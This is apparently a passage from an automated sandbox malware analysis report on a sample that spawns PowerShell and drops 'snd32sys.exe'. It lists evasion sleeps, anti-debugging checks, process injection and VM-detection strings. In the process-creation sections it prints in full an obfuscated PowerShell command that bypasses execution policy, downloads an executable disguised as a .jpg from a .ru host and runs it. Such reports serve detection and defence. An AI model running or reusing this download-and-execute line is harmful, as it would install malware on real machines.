Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1888	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3141	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 673	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1800	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1157	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908	Thread sleep count: 1800 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908	Thread sleep count: 1157 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2920	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404	Thread sleep time: -2760000s >= -30000s	Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404	Thread sleep time: -2700000s >= -30000s	Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404	Thread sleep time: -60000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\Public\snd32sys.exe	Last function: Thread delayed
Source: C:\Users\Public\snd32sys.exe	Last function: Thread delayed

Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose,		16_2_0065838E
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00657FD2 FindFirstFileExW,		16_2_00657FD2

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_006133E0 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

16_2_006133E0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.334365492.0000000004E33000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp	Binary or memory string: j:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: mshta.exe, 00000001.00000003.224307613.0000000002FDB000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00657943 IsDebuggerPresent,

16_2_00657943

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,

16_2_00613560

Contains functionality to read the PEB

Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0064C285 mov eax, dword ptr fs:[00000030h]	16_2_0064C285
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659D43 mov eax, dword ptr fs:[00000030h]	16_2_00659D43
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659DC9 mov eax, dword ptr fs:[00000030h]	16_2_00659DC9
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659D86 mov eax, dword ptr fs:[00000030h]	16_2_00659D86
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659E24 mov eax, dword ptr fs:[00000030h]	16_2_00659E24
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659ED9 mov eax, dword ptr fs:[00000030h]	16_2_00659ED9
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659F61 mov eax, dword ptr fs:[00000030h]	16_2_00659F61
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659F1D mov eax, dword ptr fs:[00000030h]	16_2_00659F1D
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659F92 mov eax, dword ptr fs:[00000030h]	16_2_00659F92
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h]	16_2_006B17C3
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h]	16_2_006B17C3
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_006B138F push dword ptr fs:[00000030h]	16_2_006B138F

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00611390 GetProcessHeap,RtlAllocateHeap,

16_2_00611390

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062BAF2 SetUnhandledExceptionFilter,	16_2_0062BAF2
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062B4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_0062B4CC
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062B95F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0062B95F
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00636D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00636D21

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject threads in other processes

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00613860 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,

16_2_00613860

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'			Jump to behavior

Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_0062BBFB cpuid

16_2_0062BBFB

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\Public\snd32sys.exe	Code function: EnumSystemLocalesW,	16_2_0065C067
Source: C:\Users\Public\snd32sys.exe	Code function: EnumSystemLocalesW,	16_2_0065C0D0
Source: C:\Users\Public\snd32sys.exe	Code function: EnumSystemLocalesW,	16_2_0065C16B
Source: C:\Users\Public\snd32sys.exe	Code function: ___crtGetLocaleInfoEx,	16_2_0062A104
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	16_2_0065C1F6
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,	16_2_0065C449
Source: C:\Users\Public\snd32sys.exe	Code function: EnumSystemLocalesW,	16_2_00651499
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	16_2_0065C56F
Source: C:\Users\Public\snd32sys.exe	Code function: EnumSystemLocalesW,	16_2_00651599
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,	16_2_0065C675
Source: C:\Users\Public\snd32sys.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	16_2_0065C744
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,	16_2_0062A79B
Source: C:\Users\Public\snd32sys.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	16_2_0065BDC5
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,	16_2_00651EBC

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
